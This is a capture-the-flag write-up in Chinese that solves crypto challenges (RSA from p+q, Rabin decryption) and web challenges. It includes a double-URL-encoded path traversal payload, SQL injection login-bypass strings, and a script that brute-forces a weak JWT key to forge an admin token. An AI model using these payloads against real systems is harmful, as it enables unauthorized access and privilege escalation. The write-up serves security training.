# ckcscCTF-final題解 > Author:堇姬 # Crypto ## Are you good at math? ``` e= 65537 c= 689283123593973266462718190994935466468974902446987599280206 p+q= 1960693995416609992388338903038 (p+1)*(q+1)= 915316705593356934122195893788784115532595689189996124532736 ``` $(p+1) \times (q+1)=pq+p+q+1$ $n=pq$ $n=(p+1) \times (q+1)-(p+q)-1$ $ϕ(n)=(p-1)*(q-1)=pq-p-q+1$ $ϕ(n)=n-((p+1) \times (q+1)-n-1)+1$ 找出d，$ed \equiv 1 \pmod {ϕ(n)}$ $m=c^d \pmod n$ ### solve ```python= from Crypto.Util.number import * import gmpy2 pq=1960693995416609992388338903038 p1q1= 915316705593356934122195893788784115532595689189996124532736 e= 65537 c= 689283123593973266462718190994935466468974902446987599280206 n=p1q1-pq-1 phi = n-(p1q1-n-1)+1 print(phi) d = gmpy2.invert(e , phi) print(long_to_bytes(pow(c , d , n))) ``` ## Futaba Sakura's cryptex 簡單來說就是三個古典密碼+一個ECB的padding oracle ## MATH IS TOO DIFFICULT!!! ``` c=36385155708314824172407130300080762276636346601376110917605592084732474782930 n=87924348264132406875276140514499937145050893665602592992418171647042491658461 e=2 ``` 證明基本上寫在裡面 https://hackmd.io/@naup96321/Sycds2bPp n用factordb就可以分解開來了 ```python= import gmpy2 import codecs def squareMod(c, mod): assert(mod % 4 == 3) res = gmpy2.powmod(c, (mod+1)//4, mod) return res, mod - res def getPlaintext(x, y, p, q): res = x*q*gmpy2.invert(q, p) + y*p*gmpy2.invert(p, q) return res % (p*q) def solve(c, p, q): px = squareMod(c, p) py = squareMod(c, q) for x in px: for y in py: yield getPlaintext(x, y, p, q) c = 36385155708314824172407130300080762276636346601376110917605592084732474782930 p = 275127860351348928173285174381581152299 q = 319576316814478949870590164193048041239 for msg in solve(c, p, q): res = hex(msg)[2:] if len(res) % 2 == 1: res = '0' + res print(codecs.decode(res, 'hex')) ``` # Web ## Riddle Joker's SECRET? 蒐集資訊+水平越權 ## Look around it! ```python= import urllib.parse def useless (file_param): file_param1 = ignore_it(file_param) file_param2 = another_useless_function(file_param1) file_param3 = ignore_it(file_param2) file_param4 = another_useless_function(file_param3) file_param5 = another_useless_function(file_param4) return file_param5 def another_useless_function(file_param): return urllib.parse.unquote(file_param) def ignore_it(file_param): yoooo = file_param.replace('.', '').replace('/', '') if yoooo != file_param: return "Illegal characters detected in file parameter!" return yoooo a=urllib.parse.quote("%2E%2E%2Fflag%2Etxt") b=urllib.parse.quote(a) print(b) print(useless(b)) ``` > %25252E%25252E%25252Fflag%25252Etxt ## Continuous Injection Challenge ### LEVEL 1 ``` admin ' OR 1=1-- ``` ### LEVEL 2 ``` ad'||'min a' IS NOT 'b ``` ### LEVEL 3 ``` [" 'OR 1=1--",1] ``` ## Many Many Shiro https://hackmd.io/@naup96321/r1ULD4SvT ```python= from tqdm import tqdm from itertools import product import jwt data = {'id': 2, 'role': "User"} def jwtjwt(secret_key): token = jwt.encode(data, secret_key, algorithm='HS256') return token realkey="" for new_key in tqdm(product(range(256), repeat=3)): new_key = bytes(new_key) if jwtjwt(new_key) == "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Miwicm9sZSI6IlVzZXIifQ.oKsFj_dKl8OXyGQn5GSh40XcJs-KHWj9dVVo_wjJlUY": realkey=new_key break admin_data={'id':1,"role":"Admin"} token = jwt.encode(admin_data,realkey,algorithm='HS256') print(realkey) print(token) ```